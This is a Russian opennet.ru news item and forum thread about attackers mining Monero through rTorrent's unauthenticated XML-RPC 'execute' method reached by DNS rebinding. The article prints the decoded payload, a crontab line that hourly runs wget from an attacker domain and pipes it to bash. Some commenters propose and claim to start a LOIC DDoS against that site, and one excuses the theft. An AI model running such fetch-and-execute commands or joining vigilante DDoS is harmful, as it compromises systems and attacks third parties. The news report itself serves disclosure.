The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"Атака на системы с rTorrent для скрытого майнинга криптовалюты"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Атака на системы с rTorrent для скрытого майнинга криптовалюты"  +/
Сообщение от opennews (ok) on 02-Мрт-18, 12:05 
Исследователи из компании F5 выявили (https://f5.com/labs/articles/threat-intelligence/malware/rto...) волну атак на пользовательские системы, в которых запущен свободный консольный torrent-клиент rTorrent (https://rakshasa.github.io/rtorrent/), использующий XML-RPC для взаимодействия с фронтэндами с реализацией интерфейсов пользователя.


Для выполнения своего кода в системе атакующие эксплуатируют особенность реализации XML-RPC в rTorrent, в которой не отключён метод  "execute", позволяющий выполнить любой shell-код в системе.  В ходе атаки в систему устанавливается собранный для unix-подобных систем инструментарий для майнинга криптовалюты Monero (XMR). На текущий момент на одном из связанных с атакой кошельков уже накопилось 13 XMR, что соответствует примерно 4200 долларам США.


Как и в случае с недавней уязвимостью (https://www.opennet.ru/opennews/art.shtml?num=47912) в BitTorrent-клиенте Transmission, интерфейс XML-RPC в rTorrent доступен без аутентификации и включает команды, которые можно использовать для выполнения кода в системе. По умолчанию rTorrent принимает запросы только на внутреннем интерфейсе  localhost (127.0.0.1), недоступном из вне, поэтому для отправки команд атакующие применяют технику "DNS rebinding (https://www.opennet.ru/opennews/art.shtml?num=27533)". Атака производится когда пользователь открывает в браузере подконтрольные злоумышленнику страницы на системе в которой также выполняется rTorrent.


Выполняемый в браузере JavaScript-код отправляет  произвольный запрос на localhost через  вызов XMLHttpRequest(). Для обхода защиты от выхода за пределы области текущего домена (cross-origin) используется метод смены имени хоста в DNS - на DNS-сервере атакующих настраивается поочерёдная отдача двух IP-адресов: на первый запрос отдаётся реальный IP сервера со страницей, а затем возвращается 127.0.0.1. Время жизни (TTL) для первого ответа выставляется в минимальное значение, поэтому при открытии страницы браузер определяет реальный IP сервера атакущего и загружает содержимое страницы. На странице запускается JavaScript-код, который ожидает истечения TTL и отправляет второй запрос, который теперь определяет хост как 127.0.0.1, что приводит к обращению к внутреннему сетевому интерфейсу компьютера пользователя без ограничений cross-origin.


Первым делом атакующие отправляют проверочный POST запрос с XML-RPC-методом "download_list". Если запрос обработан успешно, следом отправляется запрос "execute", в ходе которого  на системе пользователя выполняется команда

   echo KGNy...tCg== |base64 -d|bash


которая после декодирования из формата base64 преоборазуется в

    (crontab -l 2>/dev/null|sed '/wget/d'; echo "5 * * * * wget -qO- lyzhenko.ru/.r|bash")|crontab –


Указанный код прописывает в crontab загрузку основного скрипта, который вначале пытается завершить процессы конкурирующих вредоносных систем майнинга, удаляя процессы по маскам  "miner", "xmr", "wnTKYg", "imWBR" и "ddg", а также убивает все процессы sshd.


Далее устанавливается соединение со скрытым сервисом Tor c которого загружается непосредственно приложение для майнинга. Для доступа к Tor применяется шлюз Tor2Web, позволяющий обратиться к скрытому сервису без установки Tor при помощи обычного web-запроса.

URL: https://f5.com/labs/articles/threat-intelligence/malware/rto...
Новость: https://www.opennet.ru/opennews/art.shtml?num=48177

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +2 +/
Сообщение от freehck email(ok) on 02-Мрт-18, 12:05 
Увидел новость -- написал регистратору. Больше писем -- быстрее удалят. :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +6 +/
Сообщение от Аноним (??) on 02-Мрт-18, 12:12 
Нужно хостеру писать, а не регистратору. Это типичный взломанный сайт с необновлённым WordPress или кривым плагином, на который файлик с payload залили. Таких тысячи.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

15. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +2 +/
Сообщение от Аноним (??) on 02-Мрт-18, 13:12 
Заметьте, как на этом сайте всё прекрасно и гармонично. CMS, заголовок, его орфография, наполнение и сабжевый скрипт.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

18. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от сайтостроитель on 02-Мрт-18, 13:16 
> Заметьте, как на этом сайте всё прекрасно и гармонично. CMS, заголовок, его
> орфография, наполнение и сабжевый скрипт.

йа у мамы веб-девелопер!
(и ничем не хуже владельцев мильена аналогичных сайтов-с-cms)

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

38. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +3 +/
Сообщение от sokoloff (??) on 02-Мрт-18, 17:28 
Это вы про 127.0.0.1? :)
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

79. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +3 +/
Сообщение от X4asd (ok) on 03-Мрт-18, 14:54 
> Это вы про 127.0.0.1? :)

заходил сюда -- не плохой сайт

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

20. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +2 +/
Сообщение от freehck email(ok) on 02-Мрт-18, 13:38 
> Нужно хостеру писать, а не регистратору.

Не один ли хрен?

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

43. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от YetAnotherOnanym (ok) on 02-Мрт-18, 19:18 
А они в ответ: "Дорогой сэр, Вы сами обнаружили у себя этот эксплойт, или Вам кто-то напел? Рабинович с Опеннета напел? Передайте, пожалуйста мистеру Рабиновичу, что ему необходимо самостоятельно обратиться в наш абьюз-деск и быть готовым ответить на дополнительные вопросы наших сотрудников".
Если они этого не сделают, можно писать новость о принципиально новом способе амплификации DDOS-атак - злоумышленник публикует новость на Опеннете, сотни идиотов начинают бомбить поддержку провайдера.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

48. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Crazy Alex (ok) on 02-Мрт-18, 21:50 
Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.
Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

53. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от freehck email(ok) on 02-Мрт-18, 22:26 
> Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.

Кстати, а почему бы и нет. Предлагаю начать лойс завтра в 11.

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

62. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Crazy Alex (ok) on 03-Мрт-18, 04:16 
По России? Ок
Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

68. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от freehck email(ok) on 03-Мрт-18, 11:21 
Я начал, если что.
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

75. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 13:30 
> Я начал, если что.

Главное следить чтобы 127.0.0.1 не досталось, с DNS rebinding то :)

Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

78. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 14:34 
> Я начал, если что.

Напрашивается идея потестить https://www.opennet.ru/opennews/art.shtml?num=48161 на них. Но владельцы memcached'ов могут и не оценить :(

Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

74. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от Аноним (??) on 03-Мрт-18, 13:22 
> Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.

Ударим DDoS'ом по майнингу? А вы юмористы!!! :)

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

80. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от YetAnotherOnanym (ok) on 03-Мрт-18, 15:49 
Тсссс! Не мешайте!
Не забывайте, что в России уже третий месяц как год волонтёра идёт.
Ответить | Правка | ^ к родителю #74 | Наверх | Cообщить модератору

81. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +2 +/
Сообщение от Нанобот (ok) on 03-Мрт-18, 19:13 
Запилите кто-нибудь новость "анонимы опеннета героически предотвратили атаку на rtorrent, задосив какой-то рандомный сайт в интернете"
Ответить | Правка | ^ к родителю #74 | Наверх | Cообщить модератору

73. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 13:16 
> Увидел новость -- написал регистратору. Больше писем -- быстрее удалят. :)

Зато по своему забавно. Не успели написать новость про "взлом" трансмишна и отдельные горячие головы предложили rtorrent. И тут как гром среди ясного неба. А в трансмишн как раз починили, так что те кто мечется может уже драпать на трансмишн :)

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

84. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от freehck email(ok) on 03-Мрт-18, 21:14 
Ну драпать на transmission смысла не много. У rtorrent основной режим работы -- консолньый, и он данной проблемой не затронут.
Ответить | Правка | ^ к родителю #73 | Наверх | Cообщить модератору

86. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 04:39 
> Ну драпать на transmission смысла не много. У rtorrent основной режим работы
> -- консолньый, и он данной проблемой не затронут.

Лично я смысл в rtorrent вообще не понял. На графическом десктопе гуй выглядит лучше и интуитивнее. Для неинтерактивного применения типа автоматической качалки все эти консольные потуги все-равно не требуются. Один фиг пришлось RPC делать. Только в rTorrent и его сделали очень в духе остального - морда перекидывается с бэком стремными XMLками, на что забили уже даже совсем вебмакаки. А тут народ с ручника не снялся и понял XHR слишком буквально. Бонусом зависимость от жирных и вечно дырявых либ парсинга XML. Впрочем в rTorrent все так - круто, наворочено, и хрен знает зачем.

Ответить | Правка | ^ к родителю #84 | Наверх | Cообщить модератору

96. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от freehck email(ok) on 04-Мрт-18, 11:37 
>[оверквотинг удален]
>> -- консолньый, и он данной проблемой не затронут.
> Лично я смысл в rtorrent вообще не понял. На графическом десктопе гуй
> выглядит лучше и интуитивнее. Для неинтерактивного применения типа автоматической качалки
> все эти консольные потуги все-равно не требуются. Один фиг пришлось RPC
> делать. Только в rTorrent и его сделали очень в духе остального
> - морда перекидывается с бэком стремными XMLками, на что забили уже
> даже совсем вебмакаки. А тут народ с ручника не снялся и
> понял XHR слишком буквально. Бонусом зависимость от жирных и вечно дырявых
> либ парсинга XML. Впрочем в rTorrent все так - круто, наворочено,
> и хрен знает зачем.

rtorrent

Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

103. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от scorry (ok) on 04-Мрт-18, 21:27 
> Лично я смысл в rtorrent вообще не понял

Памяти ест меньше, позволяет больше торрентов качать-отдавать. Если я правильно понял ваш вопрос. конечно.

Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

108. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 07-Мрт-18, 08:19 
> Памяти ест меньше,

Трансмишн даже на роутере с 32 метрами по минимуму юзабелен. На 64 грузит бочками. На одноплатнике с 512 можно весь интернет залить. Там самое жирное - кэш. Его размер настраивается. Для совсем тощих систем типа роутера с 32Мб есть минимизированный режим. Не помню в rtorrent ничего подобного.

> позволяет больше торрентов качать-отдавать.

Копеечный одноплатник размером с кредитку с трансмишном около 250 торентов гоняет. Самые разные, от исошек убунты до экзотики. Больше у меня тупо торентов нет. Единственный практичный лимит - RAM под *специализированный* упреждающий кэш торент-клиента, чтобы диск постоянно не дергать. Но тут уж каждый сам выбирает между насилием над диском и объемом RAM кэша. Для SSD и флешек кэш можно использовать минимальный, у них seek близок к 0.

И да, откройте секрет, как вы менеджите в интерфейсе рторента что-то типа 200 торентов? Он же лагучий и не особо информативный. Обработке через пайпы в unix стиле он тоже такой хороший не особо вроде поддается.

Ответить | Правка | ^ к родителю #103 | Наверх | Cообщить модератору

116. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от scorry (ok) on 07-Мрт-18, 11:05 
Я верю вашему опыту и уважаю вашу точку зрения. Но, как пользовавший оба клиента и в хвост, и в гриву, аргументированно вам заявляю: rtorrent ест меньше и качает больше, чем transmission.

> И да, откройте секрет, как вы менеджите в интерфейсе рторента что-то типа 200 торентов? Он же лагучий и не особо информативный. Обработке через пайпы в unix стиле он тоже такой хороший не особо вроде поддается.

Я им управляю через браузер.

Ответить | Правка | ^ к родителю #108 | Наверх | Cообщить модератору

119. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 09-Мрт-18, 15:09 
У трансмишна настройки есть, знаете ли.

А чтобы АРГУМЕНТИРОВАННО заявлять надо наверное примеры конфигурации, и прочее описание того как и что, чтобы была пища для размышлений.

> Я им управляю через браузер.

При том RPC у него ужаснее трансмиссионного. Вон народ авторизацию настроить не может, да еще XMLки адские летают.

Ответить | Правка | ^ к родителю #116 | Наверх | Cообщить модератору

122. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от scorry (ok) on 09-Мрт-18, 15:34 
> А чтобы АРГУМЕНТИРОВАННО заявлять надо наверное примеры конфигурации, и прочее описание
> того как и что, чтобы была пища для размышлений.

Ох, юноша, да я же не собираюсь с вами спорить, ни в коем случае.

Ответить | Правка | ^ к родителю #119 | Наверх | Cообщить модератору

123. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 09-Мрт-18, 16:18 
> Ох, юноша, да я же не собираюсь с вами спорить, ни в коем случае.

Ах, под аргументированно имелось в виду загибание пальцев и размахивание сакральным знанием без конкретики и пруфов? Ну так бы сразу и сказали.

Ответить | Правка | ^ к родителю #122 | Наверх | Cообщить модератору

125. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от scorry (ok) on 10-Мрт-18, 02:08 
>> Ох, юноша, да я же не собираюсь с вами спорить, ни в коем случае.
> Ах, под аргументированно имелось в виду загибание пальцев и размахивание сакральным знанием
> без конкретики и пруфов? Ну так бы сразу и сказали.

Нет. Трансмишн лучше, я не умею его готовить, а аноним всё знает лучше.

Ответить | Правка | ^ к родителю #123 | Наверх | Cообщить модератору

2. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от freehck email(ok) on 02-Мрт-18, 12:10 
> В ходе атаки в систему устанавливается собранный для unix-подобных
> систем инструментарий для майнинга криптовалюты Monero (XMR). На
> текущий момент на одном из связанных с атакой кошельков уже накопилось
> 13 XMR, что соответствует примерно 4200 долларам США.

Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими мозгами и предприимчивостью.
Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

4. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +5 +/
Сообщение от Аноним (??) on 02-Мрт-18, 12:20 
То что он смекалистый опровергает последняя строка кода с chmod.

И вообще, смекалистым он бы был если бы придумал что-то новое, а не воспосльзовался наработками других людей.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

12. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от Аноним email(??) on 02-Мрт-18, 12:57 
> И вообще, смекалистым он бы был если бы придумал что-то новое, а не воспосльзовался наработками других людей.

А может он намеренно косит под дурачка, чтоб его не нашли. :)

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

14. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +2 +/
Сообщение от имя on 02-Мрт-18, 13:01 
в чем проблема с chmod? добавляет права на выполнение, запускает и затем удаляет файл
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

42. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +6 +/
Сообщение от RM on 02-Мрт-18, 19:10 
Я так понимаю что продвинутые админы монтируют /tmp с noexec, вот это и есть проблема конкретного chmod
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

49. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от Crazy Alex (ok) on 02-Мрт-18, 21:51 
Так то продвинутые
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

16. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 13:13 
> Можно конечно много размышлять, этично это или же нет, однако уж с
> чем точно нельзя поспорить, так это с тем, что парень смекалистый.

Смекалистый не спалился бы.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

77. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 14:31 
> Смекалистый не спалился бы.

Так спалился всего лишь какой-то бот. Если бы спалился владелец - он бы уже ожидал вызова в суд наверное, но про это в новости не говорится вроде.

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

19. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Iaaa (ok) on 02-Мрт-18, 13:19 
> Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими мозгами и предприимчивостью.
> Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

Кто-то за такие деньги 2 месяца пашет, а взломщик (вор, бандит, громила, разводила - на выбор) заработал их своими мозгами и предприимчивостью.
Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

39. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 18:51 
Вор/бандит/громила (- хз что это)/разводила такую сложную схему за всю жизнь не придумает, у них схемы то примитивные: залез в окно->натырил бижутерию->вылез/подкараулил в парке->убил->обчистил/кинул на авито заманчивую объяву->взял предоплату->выкинул симку.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

61. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +3 +/
Сообщение от angra (ok) on 03-Мрт-18, 02:25 
То есть для тебя тоже вопрос не в этике, а в сложности? Ну так здесь ведь тоже простая схема: "создал сайт с вредоносным кодом и всё". Если тебе расписать детали "залез в окно->натырил бижутерию->вылез", то всё будет куда сложнее, чем у этого кулхацкера.
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

66. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 10:31 
И чем же схема "разбить окно и вытащить все ценное" сложнее чем схема в топике? Вопрос этики и вопрос сложности - разные вещи, не сваливай все в одну кучу.
Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

70. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от angra (ok) on 03-Мрт-18, 12:10 
Ну ты попробуй, а потом на зоне тебе объяснят, в чем ты ошибся. Или ты про ключевой момент "как сделать так, чтобы потом не сесть за это" вообще не подумал?
Ответить | Правка | ^ к родителю #66 | Наверх | Cообщить модератору

87. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 10:20 
> То есть для тебя тоже вопрос не в этике, а в сложности?

И в этом тоже. К тому же сложным и казалось бы криминальным начинаниям часто находятся мирные применения. Например, спецы по отмычкам с удовольствием помогут вскрыть заклинивший замок в двери. И если выбирать между грубым дестроем железной двери или некоторой мздой специалисту, почему-то обладатели дверей часто предпочитают заплатить. А казалось бы, ну как может вскрытие замков быть чем-то хорошим? :)

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

28. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от Ю.Т. on 02-Мрт-18, 15:04 
> Можно конечно много размышлять, этично это или же нет, однако уж с
> чем точно нельзя поспорить, так это с тем, что парень смекалистый.

Распотешил момент насчёт прибития конкурентных майнилок.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

60. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +4 +/
Сообщение от angra (ok) on 03-Мрт-18, 02:16 
В большинстве мест, где я работал сисадмином, у меня была возможность проявить "смекалку" и "заработать" как минимум на порядок больше "своими мозгами и предприимчивостью". Вот только у меня, в отличии от некоторых, есть совесть. У большинства моих коллег тоже, хотя были и такие, кто с ней умел договориться.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

64. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от freehck email(ok) on 03-Мрт-18, 10:13 
> В большинстве мест, где я работал сисадмином, у меня была возможность проявить
> "смекалку" и "заработать" как минимум на порядок больше "своими мозгами и
> предприимчивостью".

Не, ну у нас-то по работе ресурс уже готовый -- бери и пользуйся. А этот парнишка сделал что-то буквально из ничего. В этом есть определённая красота всё же.

> Вот только у меня, в отличии от некоторых, есть совесть.
> У большинства моих коллег тоже, хотя были и такие, кто с
> ней умел договориться.

По поводу совести... Что ж, обладая таким доступом, он мог бы keylogger поставить, воровать номера кредитных карт, пароли. Но вместо всего этого лишь майнил.

Другое дело, что это неуважение права частной собственности, а это нельзя оставлять безнаказанным.

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору
Часть нити удалена модератором

83. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от freehck email(ok) on 03-Мрт-18, 21:08 
Надо же, коммуняжки пожаловали. :)

> Любой вор, хоть умный, хоть глупый, обкрадывающий работяг -- хуже форточника или
> карманника, и должен сидеть в тюрьме вместе с теми же форточником
> и карманником, а заодно и этого "смекалистого" туда же.

Угу. А мир у нас чётко делится на чёрное и белое, да? Вы не забывайте, что заяц в общественном транспорте -- точно такой же "вор". :)

Вот вы точно знаете, что у студента, например, денег точно никогда не водится. Поэтому он едет зайцем от общаги до универа с утра. И теперь у нас конфликт позиций. С одной стороны стоишь ты, и требуешь, чтобы его посадили в тюрьму. С другой стороны стою я, и намекаю, что обществу вообще-то нужны образованные рабочие.

Мораль тут такая: воровство -- это не всегда плохо, а асоциальные личности -- не всегда вредители.

К тому же, чтобы бороться с зайцами нужен контроллёр. Вопрос: а каков ущерб от зайцев? Если он ниже стоимости найма контроллёра, так может быть ну их нафиг, этих зайцев, пускай себе халявят? Ведь борьба с ними -- принесёт больший убыток, нежели попустительство этим "вредителям".

А ведь бывает ведь и так, что борьба за "безусловно правое дело" приводит к весьма печальным результатам. Вот при становлении вашей же любимой советской власти, "честные работяги" сначала радостно с разрешения марксанутых главнюков радостно занимались раскулачиванием "наворовавших при царизме буржуев". А когда таковые закончились, процесс было уже тяжело остановить, и эти же самые люди продолжили так же рьяно находить "сельских кулаков" среди себе же подобных.

А тут мораль уже следующая: борьба с вредителями может оказаться заразой куда страшнее, нежели сами вредители.

Применительно к данной ситуации: тут почти никакого вреда никому не нанесено, зато "вредитель" извлёк из ситуации некоторую, весьма небольшую, но выгоду. Я не хочу, чтобы парня посадили в тюрьму. Пускай развивается и совершенствуется. Именно из таких вот предприимчивых ребят и вырастают со временем неплохие хакеры и пентестеры.

PS: и вообще, кто из нынешних профессионалов не занимался по молодости мелким взломом? :)

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

85. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от angra (ok) on 03-Мрт-18, 23:25 
> Вот вы точно знаете, что у студента, например, денег точно никогда не водится.

Я был студентом в другом городе в 90-е, на месяц у меня из финансов было около $20. И я совершенно точно знаю, что денег у студентов нет только тогда, когда они их пробухали или еще на какую глупость потратили. При правильном планировании расходов, денег хватает на реально необходимое. А у тебя откуда сведения о деньгах студентов?

> С другой стороны стою я, и намекаю, что обществу вообще-то нужны образованные рабочие

И общество эту проблему может решать другим путем, например льготным проездом для студентов. А еще студенты могут ходить пешком, это полезно для здоровья.

> Мораль тут такая: воровство -- это не всегда плохо, а асоциальные личности -- не всегда вредители.

Оправдание как дырка в жoпе - есть у каждого.

> Вот при становлении вашей же любимой советской власти, "честные работяги" сначала радостно с разрешения марксанутых главнюков радостно занимались раскулачиванием "наворовавших при царизме буржуев". А когда таковые закончились, процесс было уже тяжело остановить, и эти же самые люди продолжили так же рьяно находить "сельских кулаков" среди себе же подобных.

Вот казалось бы 2018 год, тридцать лет прошло с момента, когда начали рассказывать эти сказки, их давно уже по косточкам разобрали, причем очень много раз и совершенно разные люди. Есть общедоступный интернет и гугл, которые позволяют быстро найти эти разборы, а также кучу исходных документов той эпохи. Потрать относительно немного времени  и разберись, что же действительно творилось в недавнем прошлом твоей страны, почему на эту эпоху тридцать лет победители не прекращают лить помои, используя все средства пропаганды, глядишь увидишь до ужаса много сходств с текущим моментом. Но нет, ведь для этого надо напрячь межушный ганглий, потратить время, гораздо проще повторять сказки и верить в них.

> Я не хочу, чтобы парня посадили в тюрьму. Пускай развивается и совершенствуется. Именно из таких вот предприимчивых ребят и вырастают со временем неплохие хакеры и пентестеры.

Если его не посадят, то в голове ничего не прояснится и ворьё останется ворьём. Хакером, в изначальном понимании этого слова, он не станет, голова не на то работать будет. Да и на данный момент ничего интересного этот "смекалистый" и "предприимчивый" не изобрел, просто воспользовался чужими наработками, на это ума много не надо.

> и вообще, кто из нынешних профессионалов не занимался по молодости мелким взломом? :)

Вот только делали это в подавляющем большинстве случаев не для того, чтобы заработать. А здесь в первую очередь было именно желание заработать.

Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

88. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 10:24 
> Вот только делали это в подавляющем большинстве случаев не для того, чтобы
> заработать. А здесь в первую очередь было именно желание заработать.

С другой стороны это уменьшает число дырявых сайтиков. С которых могли бы и ддосы со спамом лететь, что наверное хуже. А так урон сети минимальный, а хостеру лишний стимул выключить проблемный хост до устранения :)

Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

104. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от freehck email(ok) on 05-Мрт-18, 15:07 
>> Вот вы точно знаете, что у студента, например, денег точно никогда
>> не водится.
>
> Я был студентом в другом городе в 90-е, на месяц у меня из финансов
> было около $20. И я совершенно точно знаю, что денег у студентов нет
> только тогда, когда они их пробухали или еще на какую глупость
> потратили. При правильном планировании расходов, денег хватает на
> реально необходимое. А у тебя откуда сведения о деньгах студентов?

Ну хз, я был студентом в конце нулевых, и на 2000 деревянных в месяц при 100%й занятости в институте жить было невозможно. То есть занятия у тебя 5 дней в неделю с утра до вечера, а в выходные ты обязан сесть и делать задания, потому что иначе у тебя времени не хватит от слова совсем.

Не, прожить конечно можно, если ты готов питаться гречкой с кефиром и макаронами, но вообще-то иногда нормальному здоровому человеку хочется ещё, например, мяса, или хотя бы птицу какую-ниубдь. Индейку там, курочку... Яйца также было бы неплохо. Кофе -- это вообще шик. А шоколадка -- это уже роскошь, да?

Но не, студенты, конечно, просто сразу спускают всю стипуху на бухло. Спасибо, что открыли нам глаза, товарищ angra. Слава партии!  Даёшь фиксированные цены на водку! Ура строителям светлого будущего!  Выпивку всем и каждому, и пусть никто не уйдёт обиженным!

>> С другой стороны стою я, и намекаю, что обществу вообще-то нужны
>> образованные рабочие
>
> И общество эту проблему может решать другим путем, например льготным
> проездом для студентов. А еще студенты могут ходить пешком, это
> полезно для здоровья.

Угу. 250 рублей на абонемент -- это конечно круто. Но только не когда это 12,5% от стипухи.

Вы, коммуняки, глубокие теоретики. Вы говорите "по теории всё стопудово будет зашибись", а я говорю, что "а на практике, бывает, случается жопа". Вы говорите "эта жопа теоретически решаема", я говорю "теоретически -- это потом, а жопа -- уже сейчас".

> Вот казалось бы 2018 год, тридцать лет прошло с момента, когда
> начали рассказывать эти сказки, их давно уже по косточкам разобрали,
> причем очень много раз и совершенно разные коммунисты.

fixed

> Есть общедоступный интернет и гугл, которые позволяют быстро найти
> эти разборы, а также кучу исходных документов той эпохи.

Как и несложно найти прямо противоположные мнения: воспоминания людей, пострадавших в результате советских репрессий, у которых отняли всё, которые были вынуждены бежать из страны, у которых родственников замучали в гулагах или просто заморили голодом.

> Потрать относительно немного времени и разберись, что же
> действительно творилось в недавнем прошлом твоей страны, почему на
> эту эпоху тридцать лет победители не прекращают лить помои,
> используя все средства пропаганды, глядишь увидишь до ужаса много
> сходств с текущим моментом. Но нет, ведь для этого надо напрячь
> межушный ганглий, потратить время, гораздо проще повторять сказки и
> верить в них.

Нееееет! Это всё заговор аметистов! Неееет! :D

>> Я не хочу, чтобы парня посадили в тюрьму. Пускай развивается и
>> совершенствуется. Именно из таких вот предприимчивых ребят и
>> вырастают со временем неплохие хакеры и пентестеры.
>
> Если его не посадят, то в голове ничего не прояснится и ворьё
> останется ворьём. Хакером, в изначальном понимании этого слова, он
> не станет, голова не на то работать будет. Да и на данный момент
> ничего интересного этот "смекалистый" и "предприимчивый" не изобрел,
> просто воспользовался чужими наработками, на это ума много не надо.

